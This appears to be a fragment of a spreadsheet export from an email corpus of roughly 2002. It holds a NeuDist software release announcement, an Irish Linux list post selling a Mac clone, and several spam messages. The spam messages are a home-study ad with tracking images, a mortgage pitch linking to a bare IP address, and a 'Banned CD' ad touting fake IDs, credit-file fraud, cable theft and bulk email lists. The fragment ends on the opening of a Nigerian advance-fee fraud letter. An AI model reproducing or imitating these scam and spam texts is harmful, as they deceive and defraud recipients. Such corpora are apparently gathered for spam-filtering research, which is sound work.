 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBrR-auEYpqfRO9R6BpKcR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduMdOnkLijZWSoS2P4JmRR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdY4fIeCrXydit0M-0OvFR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2zC9rXJC41H99K8FZuS9R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1adE6bjbHCu4jNix1DPuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=eb-HlLo-YD1MUIf_rRUm0wMYZqBt9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Subject: [dgc.chat] First public release of NeuDist Distributed Transaction
 Clearing	Framework
 From: Pelle Braendgaard &lt;pelle@neubia.com&gt;
 To: dgcchat@lists.goldmoney.com
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, DGCChat
 &lt;dgcchat@lists.goldmoney.com&gt;, xmlx &lt;xml-api@intertrader.com&gt;
 Date: 19 Sep 2002 00:05:39 -0500
 Reply-To: &lt;dgcchat@lists.goldmoney.com&gt;
 I'm happy to announce the first public release of NeuDist
 NeuDist is an Open Source Software framework for building applications
 for the Neubia Distributed Clearing Platform.
 This release contains early java libraries and documentation that would
 primarily be of interest to developers.
 Talking about documentation, it is still a bit slim and mainly oriented
 towards people with experience in Java/XML development.
 There are currently no sample applications, but they will be available
 in the next release.
 The framework currently contains the following:
 - Classes for creating "Named Objects", which are authenticated using
 digital signatures within a hierarchy.
 - Storage framework for "Named Objects".
 - Simple XML-Signature implementation (Almost certainly not yet
 interoperable with other implementations)
 - Simple SOAP client
 - Simple Servlet API for handling SOAP requests based on "Named
   Objects".
 - Current types of "Named Objects" include:
     NameSpace objects -- for maintaining the NameSpace Authentication
  	Framework
     AuthenticationTickets -- for doing web site authentication using
 	digital signatures.
 Next major release is scheduled to contain:
  - Core:
 	hard coded root public key, for authenticating top level 	NameSpaces
  - Signing Services:
 	Implementation of web based signing services
 	End user hosted signing service
  - Example User Authentication Application
  - Example Payment System based on NeuDist
 I will be expanding the documentation over the next few weeks. This will
 cover not only more indepth technical documentation, but also higher
 level documentation about the business side of things.
 Read more about NeuDist or download our early version at
 http://neudist.org
 I would love to hear your questions and suggestions. To discuss it
 further please join neudist-discuss@lists.sourceforge.net
 You can join it at:
 http://lists.sourceforge.net/mailman/listinfo/neudist-discuss
 Regards
 Pelle
 -- 
 Antilles Software Ventures SA 		http://neubia.com/asv
 My Web Log Live and Direct from Panama	http://talk.org
 Views of an EconoFist			http://econofist.com
 subscribe: send blank email to dgcchat-join@lists.goldmoney.com
 unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
 digest: send an email to dgcchat-request@lists.goldmoney.com
 with "set yourname@yourdomain.com digest=on" in the message body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_______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Busy? Home Study Makes Sense!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"&gt;
 &lt;title&gt;Want To Be Your Own Boss?&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" link="#990000" vlink="#990000"&gt;
 &lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt; &lt;/font&gt; 
 &lt;div align="center"&gt;
 			&lt;table width="500" border="0" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt; 
       &lt;td height="20"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt; 
       &lt;td&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/unisex_header.gif" alt="" height="113" width="500" border="0"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt; 
       &lt;td&gt; &lt;table border="0" cellpadding="0" cellspacing="0" width="500"&gt;
 							&lt;tr&gt;
 								&lt;td width="2" bgcolor="#006699"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" width="2" height="2" border="0"&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;table border="0" cellpadding="6" cellspacing="3" bgcolor="white"&gt;
 										&lt;tr&gt;
 											&lt;td&gt;
 												&lt;div align="left"&gt;
 													&lt;font size="4" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;&lt;font size="3"&gt;Train Now With Self-Paced Home Study&lt;br&gt;
 															&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;Thousands of people -- people just like you -- are able to work from home thanks to the convenience of distance learning courses from PCDI.&lt;br&gt;
 														&lt;br&gt;
 													&lt;/font&gt;&lt;font size="3" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;BONUS! $200 tuition discount when you enroll!&lt;br&gt;
 														&lt;/b&gt;&lt;/font&gt;&lt;font size="3" color="#cc0000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;&lt;br&gt;
 														&lt;/b&gt;&lt;/font&gt;
 													&lt;table border="0" cellspacing="0" cellpadding="0"&gt;
 														&lt;tr&gt;
 															&lt;td valign="top" width="225"&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;PCDI&lt;/b&gt; offers over 40 popular career training programs, including:&lt;br&gt;
 																	&lt;br&gt;
                             &lt;/font&gt; &lt;table border="0" cellspacing="3" cellpadding="0"&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Medical Transcription&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Medical Billing&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Electrician&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Interior Decorating&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Child Day Care&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   Private Investigation&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt; 
                                 &lt;td width="20"&gt;&lt;/td&gt;
                                 &lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; 
                                   And more!&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                             &lt;/table&gt;
                             &lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;br&gt;
 																	&lt;b&gt;High School Diploma.&lt;/b&gt; Start where you left off in 9th - 12th grade.&lt;br&gt;
 																&lt;/font&gt;&lt;/td&gt;
 															&lt;td valign="top" width="5"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" alt="" height="1" width="5" border="0"&gt;&lt;/td&gt;
 															&lt;td valign="top" bgcolor="#aaaaaa" width="1"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" alt="" height="1" width="1" border="0"&gt;&lt;/td&gt;
 															&lt;td valign="top" width="10"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" alt="" height="1" width="10" border="0"&gt;&lt;/td&gt;
 															&lt;td valign="top" width="225"&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;Associate's Degree Programs.&lt;/b&gt; Take your education further: earn your nationally accredited degree in&lt;br&gt;
 																	&lt;br&gt;
 																&lt;/font&gt;
 																&lt;table border="0" cellspacing="3" cellpadding="0"&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Paralegal Studies&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Criminal Justice&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Early Childhood Education&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Accounting&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Health Care Management&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Small Business Management&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; Human Resource Management&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																	&lt;tr&gt;
 																		&lt;td width="20"&gt;&lt;/td&gt;
 																		&lt;td&gt;&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt; And more!&lt;/font&gt;&lt;/td&gt;
 																	&lt;/tr&gt;
 																&lt;/table&gt;
 															&lt;/td&gt;
 														&lt;/tr&gt;
 													&lt;/table&gt;
 													&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;br&gt;
 														&lt;a href="http://www.pcdi-homestudy.com/courses/?code=E16U"&gt;&lt;b&gt;CLICK HERE NOW!&lt;/b&gt;&lt;/a&gt; Order your FREE Career Information Kit. Enjoy a $200 tuition savings when you enroll in any one of our nationally accredited courses!&lt;/font&gt;&lt;/div&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 									&lt;/table&gt;
 								&lt;/td&gt;
 								&lt;td width="2" bgcolor="#006699"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" width="2" height="2" border="0"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="90"&gt;
             &lt;td bgcolor="#006699" colspan="3" height="90"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/unisex_5up.jpg" alt="" height="90" width="500" border="0"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="2" bgcolor="#006699"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="3" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" width="2" height="2"&gt; &lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 								&lt;td bgcolor="#FFFFFF"&gt;
 									&lt;table border="0" cellpadding="6" cellspacing="3" bgcolor="white"&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;font size="3" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;FREE home study career information kit&lt;br&gt;
 													&lt;/b&gt;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;PCDI's nationally accredited home study programs will fit into the busiest lifestyle -- without disrupting your work, family life, or leisure activities.&lt;br&gt;
 													&lt;br&gt;
 												&lt;/font&gt;
 												&lt;table border="0" cellpadding="0" cellspacing="3"&gt;
 													&lt;tr&gt;
 														&lt;td width="30" valign="top"&gt;
 															&lt;div align="right"&gt;
 																&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 														&lt;td valign="top"&gt;
 															&lt;div align="left"&gt;
 																&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;Comprehensive study materials are mailed to your home&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 													&lt;/tr&gt;
 													&lt;tr&gt;
 														&lt;td width="30" valign="top"&gt;
 															&lt;div align="right"&gt;
 																&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 														&lt;td valign="top"&gt;
 															&lt;div align="left"&gt;
 																&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;Enjoy self-paced lessons and open-book exams&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 													&lt;/tr&gt;
 													&lt;tr&gt;
 														&lt;td width="30" valign="top"&gt;
 															&lt;div align="right"&gt;
 																&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 														&lt;td valign="top"&gt;
 															&lt;div align="left"&gt;
 																&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;Affordable, interest-free monthly tuition&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 													&lt;/tr&gt;
 													&lt;tr&gt;
 														&lt;td width="30" valign="top"&gt;
 															&lt;div align="right"&gt;
 																&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 														&lt;td valign="top"&gt;
 															&lt;div align="left"&gt;
 																&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;No commuting, no parking fees, no pressure!&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 													&lt;/tr&gt;
 													&lt;tr&gt;
 														&lt;td width="30" valign="top"&gt;
 															&lt;div align="right"&gt;
 																&lt;font size="2" color="#990000" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&amp;#149;&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 														&lt;td valign="top"&gt;
 															&lt;div align="left"&gt;
 																&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;Receive your diploma at graduation&lt;/font&gt;&lt;/div&gt;
 														&lt;/td&gt;
 													&lt;/tr&gt;
 												&lt;/table&gt;
 												&lt;font size="3" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;b&gt;&lt;br&gt;
 													&lt;/b&gt;&lt;/font&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;a href="http://www.pcdi-homestudy.com/courses/?code=E16U"&gt;&lt;b&gt;Send for your FREE Career Information Kit now --&lt;/b&gt; &lt;b&gt;CLICK HERE NOW!&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;Find out how you can study at home, work at home, and succeed!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 									&lt;/table&gt;
 								&lt;/td&gt;
 								&lt;td width="2" bgcolor="#006699"&gt;&lt;font size="3" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" width="2" height="2"&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr bgcolor="#006699"&gt; 
             &lt;td height="2" colspan="3"&gt;&lt;font size="3" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;img src="http://images.pcdi-homestudy.com/ads/e277/1pixel.gif" width="2" height="2"&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 			&lt;br&gt;
 		&lt;/div&gt;
 	&lt;/body&gt;
 &lt;/html&gt;
 &lt;br&gt;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src="http://www.frugaljoe.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=396068\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=396068\~moc.cnietonten^^mj\~1754388\~12a1&lt;br&gt;
 Third-party advertisements, from lines, and subject lines contained in this email are the sole responsibility of the advertiser.&lt;BR&gt; 
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt; &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=jm@netnoteinc.com&amp;oid=Professional_Career_Development_Institute-1-12032002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] FW: Mac (clone) for sale...
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been asked to forward this on ... 
 Anyone interested, give me a shout and I'll put you in touch with Ryan ...
 P
 &gt; -----Original Message-----
 &gt; Proinnsias, 
 &gt; 
 &gt; I'd be obliged if you could pass this along to all your Linux buddies....
 &gt; 
 &gt; For Sale:
 &gt; 	Power Computing PowerCurve
 &gt; (http://www.powerwatch.com/systems/pcurve.html)
 &gt; 	Original 120Mhz PPC-601 daughter card
 &gt; 	Slim Desktop case
 &gt; 	128MB RAM (new)
 &gt; 	2GB Apple (IBM) SCSI-2 HDD (new)
 &gt; 	Ati Rage Video card (new)
 &gt; 	4 x Speed Toshiba CdRom (used, not apple but driver hacked -
 &gt; available from web)
 &gt; 	keyboard &amp; mouse (new)
 &gt; 
 &gt; 	Currently running MacOS9.1 (small partition) and Debian "Woody".  OK
 &gt; as is (think 
 &gt; 	Pentium 233ish) or ready for upgrade to G3-500 for some real
 &gt; performance!
 &gt; 
 &gt; 	Asking price EUR200, open to negotiation.
 &gt; 
 &gt; Regards, 
 &gt; Ryan
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the lowest possible interest rate for you--GUARANTEED.
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity is knocking. Why?
 Because mortgage rates are rising.
 As a National Lender, not a broker, we can
 guarantee you the lowest possible rate on your
 home loan.
 Rates may well never be this low again. This is
 your chance to secure a better future. You could
 literally save enough money to buy that new car
 you've been wanting or to take that special
 vacation. Why pay more than you have to pay?
 We can guarantee you the best rate and the best
 deal possible for you. But only if you act now.
 This is a free service. No fees of any kind.
 You can easily determine if we can help you in
 just a few short minutes. We only provide
 information in terms so simple that anyone can
 understand them. We promise that you won't need
 an attorney to see the savings.
 We offer both first and second home loans and we
 will be happy to show you why your current loan
 is the best for you. 0r why you should replace
 it.
 Once again, there's no risk for you. None at all.
 Take two minutes and use the link(s) below that
 works for you. Let us show you how to get more
 for yourself and your family. Don't let
 opportunity pass you by. Take action now.
 &lt;a href="http://mamma.com/Search?evid=CE002333701a&amp;eng=Lycos&amp;cb=WebZone&amp;dest=http://211.167.74.101/mortg/"&gt;Click_Here&lt;/a&gt;
 http://mamma.com/Search?evid=CE002333701a&amp;eng=Lycos&amp;cb=WebZone&amp;dest=http://211.167.74.101/mortg/
 Sincerely,
 Chalres M. Gillette
 MortCorp, LLC
 lnqqbopolnujfmigjbfcittazhnnfxnmysspcmokdljxprdecawunewuumvjtpfnsbqwknqfkybbuvvnikbxcsnxdodgistybllysriqulpzvspiqkcbpjxvh
 __________________________________________________________________
 Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I could be JAILED for selling this CD!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear fellow eBay user,
 I listed this CD on eBay a few months ago and here's 
 what happened.  I got an email from Safeharbor saying 
 that all my auctions had been cancelled and that the CD 
 was permanently "banned" from being sold on eBay.  From 
 then on, I called it the "Banned CD"!
 So why did eBay ban it?  Maybe they figured you shouldn't 
 have access to this type of information, or maybe they 
 didn't think we could cram all of these programs onto 
 one CD Rom.  I'll let you decide.
 This CD will teach you things that eBay, Uncle Sam, and 
 others just don't want you to know.  I am not responsible 
 for how you use some of this information and it is 
 provided for educational purposes only.  Here are just a 
 few of the things you will learn ...
 *** Find confidential info on anyone in 30 minutes or 
 less on the Internet.  
     You'll be able to track down your old flame, find 
     out how much money your ex is hiding in their bank 
     account, or run a background check on proespective 
     client or employee.  Even government agencies have 
     trouble obtaining much of this information.  You 
     will have all the resources of any professional 
     investigator right at your fingertips - on your 
     home computer!
 *** List of companies who will issue you a college 
     degree (including a Phd.) for a fee.  No study 
     required!
 *** Learn how to get FREE cable and DSS channels, 
     including the adult stations and Pay-Per-View!
 *** List of suppliers of "questionable" items, such as 
     fcc banned communications devices, scanners, night 
     vision goggles, passports, fake identification, and 
     everything else that you won't find in the back of 
     Soldier of Fortune magazine!
 *** Find products to resell on the Internet with our 
     Wholesale Directory containing over 1 million 
     (that's right, one million!) wholesale sources for 
     computers, electronics, beanies, trend items, 
     jewelry, cars, collectibles, and everything else!  
 *** Over 25 million email addresses, fresh and targeted!
     You can use these to contact the people and send 
     them your advertisements.
 *** Find out how to get a completely new identity.  
     Disappear without a trace!
 *** Find out how to ERASE bad credit and even create a 
     whole new file in the credit bureau computers.
 *** Learn how to beat the IRS. Tax tips for the rest of
     us.
 *** Complete guide on how to claim public land offered 
     by the Government. You can find your dream home for
     a ridiculously low price or buy properties to resell
     for a huge profit! 
 *** Accept checks from your customers by fax, phone and
     email with the full working version of Checker 
     Software included!
 *** Business software to help you run your small business, 
     including label maker software, money management software, 
     IRS forgiveness program, database software, and much more.
 *** A huge collection of screensavers, graphics, clipart, 
     and desktop themes to spice up your computer.
 *** MUCH, MUCH MORE that we don't have room to list!
 Ask yourself this question: where else will you find such
 a HUGE collection of information and software on one CD? 
 And who else would dare sell you a CD containing so much 
 "contraband" info?  It was banned on eBay, has been 
 prohibited in THIRTY THREE countries, and will soon be 
 unavailable in the USA. If you wait more than a few days
 to order this CD, I can't guarantee I will be able to 
 sell it.  Get this CD *** NOW *** before it is banned forever!
 We accept Visa/Mastercard, Paypal, or cash/check/money order. 
 To order the "Banned CD" right now for the super low price of 
 only $19.99, Click on the link below to pay with a 
 Visa or Mastercard. This will take you to our secure 
 server for order processing: 
 http://tv-discounters.com/bannedc10.htm
 If you have trouble accessing the link above,
 please try this url instead:
 http://www.tv-discounters.com/bannedc10.htm
 Or you may send cash, check or money order by filling out
 the order form below.
 ------------------------- CUT HERE -----------------------
 "Banned CD"
 Price: $19.99 + $4.01 Shipping
 HOW TO ORDER BY MAIL: Print out this order form and
 send cash, personal check, money order or cashier's
 check to the address listed below:
 Quiksilver Enterprises
 816 Elm St. #472
 Manchester, NH 03101
 Your Shipping Information:
 Your Name_____________________________________________
 Your Address__________________________________________
 Your City_____________________________________________
 State / Zip___________________________________________
 Phone #: _____________________________________________
 (For problems with your order only. No salesmen will call.)
 Email Address_________________________________________
 NOTE: Shipping is delayed by up to ten days on all mail-in 
 orders.
 [ ] YES! Please rush order my "Banned CD"!!
 * Please check one of the following payment options:
 [ ] I am mailing my credit card number. (Note your 
 card will be charged for $24.00)
 [ ] I am enclosing a check or money order for $24.00
 If paying by credit card, please fill in the information 
 below:
 Credit Card Number:________________________________
 Expiration Date:___________________________
 Signature:_________________________
 Date:____________________
 NOTE: This CD is for informational, educational, or 
 entertainment purposes only.  Some of the activities
 described on this CD may be illegal if carried out.
 This CD contains links and addresses of companies
 and individuals which produce various products, or
 offer various services, which may be illegal in your
 country, state, or city.  However, it is perfectly 
 LEGAL to purchase and possess the Banned CD in the 
 United States of America.  Contains approximately 
 100 megs of information.
 Shipping outside USA add $10.00
 Send an email to "affiliate5@btamail.net.cn"
 if you no longer wish to receive these mailings.
 {%rand%}
 3084CCld6-429PrXi6858xaVB5-06l27
</t>
  </si>
  <si>
    <t xml:space="preserve">20th July, 2002
 To:    The President
 From:  AB Sanni
 Assalam Aleikum,
 I wish to seek your assistance in a matter that needs trust secrecy and
 confidentiality.
 I am A. B. Sanni, a close confidant to Mohammed Abacha, son of late
 General Sani Abacha, former head of state Federal Republic of Nigeria, who
 ruled from November 17th 1993 to June 8th 1998 when he died suddenly in
 office.
 Since then, the family as a whole has been facing all sorts of
